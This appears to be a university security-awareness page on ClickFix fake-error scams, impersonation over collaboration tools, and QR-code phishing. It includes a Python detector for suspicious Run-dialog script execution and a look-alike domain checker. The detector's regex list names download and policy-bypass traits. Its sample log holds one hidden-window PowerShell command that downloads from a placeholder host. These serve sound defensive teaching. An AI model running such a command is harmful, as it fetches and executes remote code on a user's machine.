ClickFix scams are a type of social engineering attack that tricks users into unknowingly running malicious commands on their own computers by presenting fake system or browser errors. The victim is manipulated into performing a sequence of actions that bypass standard security measures and install malware.
How a ClickFix Scam Works
The attack typically follows a clever multi-step process that exploits user trust and the desire to “fix” an apparent problem quickly.
- The Lure: The victim encounters a pop-up message on a malicious or compromised website that mimics a legitimate alert, such as a “Verify you’re human” CAPTCHA, a browser update notification, or an error message (e.g., “Aw, Snap!” or “Word Online extension missing”).
- The Deception: The prompt provides instructions on how to solve the problem, often involving a “Fix It” or “Copy Fix” button. Clicking this button uses a malicious script to silently copy an obfuscated, harmful command to the user’s clipboard.
- The Execution: The user is then instructed to open a legitimate system utility, typically the Windows Run dialog box (by pressing Windows + R), paste the clipboard’s content (using Ctrl + V), and press Enter.
- The Payload: By executing the command, the user inadvertently launches a script that downloads and installs malware, such as information stealers (e.g., Lumma Stealer), remote access trojans (RATs), or other harmful payloads.
Because the user initiates the command themselves using a legitimate system tool, the action often bypasses traditional antivirus and browser security warnings.
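Behavioral detection of the execution step described above, as an added example rather than anything from the original page: it scores process-creation records for a script host launched from explorer.exe (which hosts the Run dialog) with download, hidden-window, encoded-command, or policy-bypass traits. The JSON field names, the sample records and the example.invalid URL are constructed, not a real EDR schema or real telemetry.

```python
"""Heuristic scoring of ClickFix-style command execution over process-creation records.
Added example; field names and sample records are constructed, not a real EDR schema."""
import json
import re

# Interpreters a command pasted into the Run dialog is typically launched through.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# The Run dialog is hosted by explorer.exe, so this parent marks a user-typed command.
USER_PARENTS = {"explorer.exe"}
# Command-line traits of a fetch-and-run payload: remote URL, download helper, hidden window, encoded command, policy bypass.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "download": re.compile(r"\b(iwr|invoke-webrequest|curl|downloadstring|bitsadmin)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded_cmd": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-ep\s+bypass|executionpolicy\s+bypass", re.I),
}

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]  # strip a Windows path down to the file name

def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    if _basename(event.get("image", "")) not in SCRIPT_HOSTS:
        return 0, reasons
    if _basename(event.get("parent_image", "")) in USER_PARENTS:
        reasons.append("interactive_parent")
    cmd = event.get("command_line", "")
    reasons.extend(name for name, rx in INDICATORS.items() if rx.search(cmd))
    return len(reasons), reasons

def detect(lines, threshold=3):
    """Return alerts for JSON-lines records whose score meets the threshold."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"user": event.get("user"), "score": score, "reasons": reasons})
    return alerts

# Constructed sample records: one ClickFix-like paste, one build job, one benign app launch.
SAMPLE_LOG = [
    '{"user":"jdoe","parent_image":"C:\\\\Windows\\\\explorer.exe","image":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe","command_line":"powershell -w hidden -ep bypass iwr http://example.invalid/fix"}',
    '{"user":"svc_build","parent_image":"C:\\\\Jenkins\\\\java.exe","image":"C:\\\\Windows\\\\System32\\\\cmd.exe","command_line":"cmd /c build.bat"}',
    '{"user":"jdoe","parent_image":"C:\\\\Windows\\\\explorer.exe","image":"C:\\\\Windows\\\\System32\\\\notepad.exe","command_line":"notepad.exe notes.txt"}',
]
```

Running `detect(SAMPLE_LOG)` flags only the first record; the build job uses cmd.exe from a non-interactive parent with no payload traits, and notepad is not a script host at all.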
How to Protect Yourself
User awareness is the most effective defense against ClickFix scams.
- Never copy and paste commands from unfamiliar or suspicious sources. No legitimate website or service will ask you to open a system terminal (like Run, PowerShell, or Mac Terminal) and paste code to verify your identity or fix an issue.
- Close suspicious pop-up windows immediately. If a website displays an unexpected error message or security prompt, do not interact with it. Use the Task Manager (Ctrl + Shift + Esc) to close the browser if necessary.
- Keep your systems and applications updated. Use reputable antivirus/endpoint protection software that employs behavioral analysis to detect unusual activity, such as suspicious command execution, even if a known malware signature isn’t present.
- Be cautious with all online interactions. Be wary of urgent language, unexpected security checks, or requests for unusual actions, regardless of how legitimate the page looks.
- Verify the source of information. If you receive an unexpected notification (e.g., from a bank, social media, or IT support), do not use the links or instructions provided. Instead, navigate directly to the official website or contact the organization through a trusted, known method.
Collaboration tool impersonation scammers are cybercriminals who exploit business communication platforms (such as Microsoft Teams, Slack, or Zoom) to pose as trusted colleagues, executives, or vendors. Their goal is to deceive employees into performing actions that result in financial loss or the exposure of sensitive information.
How the Scams Work
Scammers leverage the trust and fast-paced nature of collaborative work environments to bypass normal security protocols. The attack typically involves several phases:
- Research: Attackers gather information on potential targets (e.g., finance officers, HR staff) and senior executives using public sources like LinkedIn and company websites.
- Impersonation: They create fake accounts, spoof email domains, or compromise existing accounts to make their communications appear legitimate. Advanced scammers use AI to clone voices or create deepfake videos of executives to enhance credibility.
- The Ask: The scammer contacts the target via a chat message or email, often creating a sense of urgency (“I’m in a meeting and need this done now”) or authority. Common requests include:
- Initiating a wire transfer to a fraudulent account (known as Business Email Compromise or CEO Fraud).
- Sharing sensitive data like W-2 forms or login credentials.
- Clicking on a malicious link that installs malware or leads to a phishing site.
Red Flags and Protection
Identifying these scams can be difficult, as they often lack traditional red flags like spelling errors and are designed to blend into everyday communications.
- Verify Requests: Always verify urgent or unusual requests through a secondary, trusted communication channel (e.g., call the person’s known phone number or use a different platform).
- Be Skeptical of Urgency: Scammers use pressure to prevent critical thinking. Legitimate organizations and executives rarely demand immediate action without proper channels.
- Check the Sender’s Details: Look closely at the email address or username for subtle variations, typosquatting, or look-alike domains (e.g., company.io instead of company.com).
- Report Suspicious Activity: Promptly report any suspicious communication to abuse@bu.edu.
Quishing (QR code phishing) is a cyberattack that uses malicious QR codes, often placed in emails, text messages, or physical locations, to trick victims into scanning them. The code leads to a fake login page that steals credentials, a fraudulent app that installs malware, or a form that collects sensitive data for identity fraud. Because the link is hidden inside an image and opened on the victim’s phone, it bypasses standard email filters. Attackers embed malicious links in QR codes that look legitimate (for example, offering a discount or posing as an HR notice) but redirect users to spoofed sites that harvest personal information and passwords or install malware.
How it works
- Delivery: Scammers place QR codes in emails (as images), texts, or even on physical posters/menus, impersonating trusted entities like banks, government, or delivery services.
- The Lure: The code promises a reward (discount, urgent notice) or appears in a trusted context (like an office breakroom).
- The Scan: You scan the code with your phone, which hides the malicious URL from email security.
- The Trap: You land on a fake website or download malware, giving up credentials, financial details, or infecting your device.
Why it’s effective
- Bypasses filters: Email security tools that scan link text can’t read the URL encoded inside a QR image.
- Mobile convenience: Users are accustomed to scanning codes on mobile, often without scrutinizing the URL.
- Physical context: Codes on posters or menus feel more tangible and trusted.
How to protect yourself
- Pause before scanning: Don’t scan unexpected QR codes in emails or physical spots.
- Inspect the source: Check the sender and message for red flags like poor grammar.
- Verify independently: Be extra skeptical if an email from HR contains a QR code; go directly to BU.EDU/HR instead of using the code.
- Use MFA: At BU we use DUO multi-factor authentication, which adds a layer of defense even if credentials are stolen. Make sure to use it whenever you can for your personal accounts too!
- Be wary of discounts: Be suspicious of offers in unexpected QR codes.
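A link check that serves both the look-alike domain advice in the collaboration-tool section (company.io instead of company.com) and the quishing advice to verify a QR-decoded link before using it, written as an added example that is not from the original page. The trusted-domain list, the confusable-character table and the sample URLs are constructed, and the two-label “registrable domain” rule is a simplification (no public suffix list).

```python
"""Look-alike domain check for a URL seen in a chat message or decoded from a QR code.
Added example; TRUSTED, CONFUSABLES and SAMPLES are constructed. Registrable domain is
approximated as the last two labels of the host name (no public suffix list)."""
from urllib.parse import urlsplit

TRUSTED = {"bu.edu", "company.com"}          # domains the organization actually uses (constructed)
CONFUSABLES = {"0": "o", "1": "l", "rn": "m", "vv": "w"}  # visually similar substitutions

def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable(host):
    """Simplified: the last two labels of the host name."""
    return ".".join(host.split(".")[-2:])

def classify(url):
    """Return (verdict, matched_trusted_domain) for a URL."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    if "." not in host:
        return "invalid", None
    for t in sorted(TRUSTED):
        if host == t or host.endswith("." + t):
            return "trusted", t                      # the real domain or a subdomain of it
    r_label, r_tld = registrable(host).split(".", 1)
    for t in sorted(TRUSTED):
        t_label, t_tld = t.split(".", 1)
        if host.startswith(t + "."):                 # trusted name used as someone else's subdomain
            return "trusted_name_as_subdomain", t
        if r_label == t_label and r_tld != t_tld:    # same name, different TLD (company.io)
            return "lookalike_tld", t
        normalized = r_label
        for k, v in CONFUSABLES.items():
            normalized = normalized.replace(k, v)
        if normalized == t_label or edit_distance(r_label, t_label) <= 1:
            return "lookalike", t                    # homoglyph or one-character typosquat
    return "unknown", None

# Constructed sample links, e.g. the decoded content of a QR code or a link in a Teams message.
SAMPLES = ["https://www.bu.edu/hr", "https://company.io/login", "https://c0mpany.com/",
           "https://bu.edu.login-portal.example/", "https://example.org/"]
RESULTS = {u: classify(u) for u in SAMPLES}
```

Only the first sample is trusted; the others are flagged as a wrong TLD, a homoglyph, a trusted name buried in another domain’s subdomain, and an unknown domain respectively.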
